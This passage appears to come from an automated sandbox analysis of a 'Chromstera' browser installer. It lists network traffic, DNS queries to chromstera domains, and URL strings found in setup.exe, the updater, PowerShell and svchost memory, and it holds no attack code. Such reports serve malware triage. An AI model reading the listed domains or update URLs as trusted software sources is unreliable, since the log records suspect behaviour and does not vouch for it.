                      Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global traffic
                      HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1
                      Host: clients2.googleusercontent.com
                      Connection: keep-alive
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global traffic
                      HTTP traffic detected: GET /assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService HTTP/1.1
                      Host: edgeassetservice.azureedge.net
                      Connection: keep-alive
                      Edge-Asset-Group: ArbitrationService
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1730743968&P2=404&P3=2&P4=Wrd8ru3elfd9jwwVA5G6RHmd6vG5sKYlGMT5c86MTidAQ0tDgfnQ9YY1PzzS5qN6OVHCl6NdqNQitO2C6oK2CQ%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: JN3t9tLnHvPwoNcvg4GThUSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: setup.exe, 00000000.00000002.2949283112.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp, setup.exe, 00000000.00000000.1694822221.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp, setup.exe, 00000003.00000002.2948103378.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: FlashWindowExFlashWindowGetPackagePathhttp://www.google.comTESTtin9999.tmphttp://www.yahoo.comhttp://www.example.com.part= "GETattachmentDLD123filenamecharsetutf-16ISO-8859-1POSTutf-8Local Network ServerFTP ServerUS-ASCIIAdvancedInstallerRange: bytes=%u- equals www.yahoo.com (Yahoo)
                      Source: setup.exe | String found in binary or memory: VFlashWindowExFlashWindowGetPackagePathhttp://www.google.comTESTtin9999.tmphttp://www.yahoo.comhttp://www.example.com.part= "GETattachmentDLD123filenamecharsetutf-16ISO-8859-1POSTutf-8Local Network ServerFTP ServerUS-ASCIIAdvancedInstallerRange: bytes=%u- equals www.yahoo.com (Yahoo)
                      Source: setup.exe | String found in binary or memory: http://www.yahoo.com equals www.yahoo.com (Yahoo)
                      Source: global traffic | DNS traffic detected: DNS query: chromsterabrowser.com
                      Source: global traffic | DNS traffic detected: DNS query: secure.chromstera.com
                      Source: global traffic | DNS traffic detected: DNS query: chromsteraupdates.com
                      Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: unknown | HTTP traffic detected: POST /dns-query HTTP/1.1 | Host: chrome.cloudflare-dns.com | Connection: keep-alive | Content-Length: 128 | Accept: application/dns-message | Accept-Language: * | User-Agent: Chrome | Accept-Encoding: identity | Content-Type: application/dns-message
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 28 Oct 2024 18:11:31 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Referrer-Policy: no-referrer | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4g0jurbb%2FylK2vxdGNtVOvYJ6WuYmHIJDz157KP1iuDbj2hgY2dNAcVG1v85MCCMcU0hYATOIB9I3tzplk3I1Dg4PmrjZncSKwOyB6wlxUdmw34FPOLlgKRlbM8Xx1WKD%2BUSuEFMME%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8d9ce38bffc5e96a-DFW | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1643&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=733&delivery_rate=1698533&cwnd=248&unsent_bytes=0&cid=2453cd3faa7abb50&ts=320&x=0"
                      Source: setup.exe, 00000003.00000002.2950850440.0000000004160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtDS
                      Source: setup.exe, 00000000.00000003.2315981321.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2951194145.0000000003C75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2317680666.0000000003C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtN
                      Source: ChromsteraUpdater.exe, 00000008.00000002.1810981504.00000000005E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtater.
                      Source: setup.exe, 00000000.00000003.1719360172.00000000062C3000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1719465037.00000000062DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtr
                      Source: setup.exe, 00000003.00000002.2952383643.0000000005110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsterabrowser.com/download/updates.txtromstera
                      Source: ChromsteraUpdater.exe, 00000008.00000002.1810981504.000000000064D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/
                      Source: ChromsteraUpdater.exe, 00000008.00000002.1810981504.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810981504.0000000000636000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txt
                      Source: setup.exe, 00000003.00000003.1741315776.0000000004162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txtB3
                      Source: setup.exe, 00000000.00000003.1699493565.00000000008B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txtCheckFrequencyDownloads
                      Source: setup.exe, 00000000.00000002.2950690414.0000000003C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txtY0
                      Source: ChromsteraUpdater.exe, 00000008.00000002.1810981504.00000000005E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txtl
                      Source: setup.exe, 00000000.00000003.1699659793.0000000000909000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1699730264.000000000092C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1699769061.0000000000937000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromsteraupdates.com/download/updates.txttd
                      Source: powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000E.00000002.2048653111.000001BA101B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA36A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA2F3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA344000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA338000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.2096112587.00000278DA357000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.27.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: svchost.exe, 0000001B.00000003.2096112587.00000278DA312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                      Source: powershell.exe, 0000000E.00000002.1956633566.000001BA00233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000006.00000002.1813013819.0000025200C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1860654492.0000024880E74000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1956633566.000001BA00C33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 0000000A.00000002.1929021569.00000248983C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
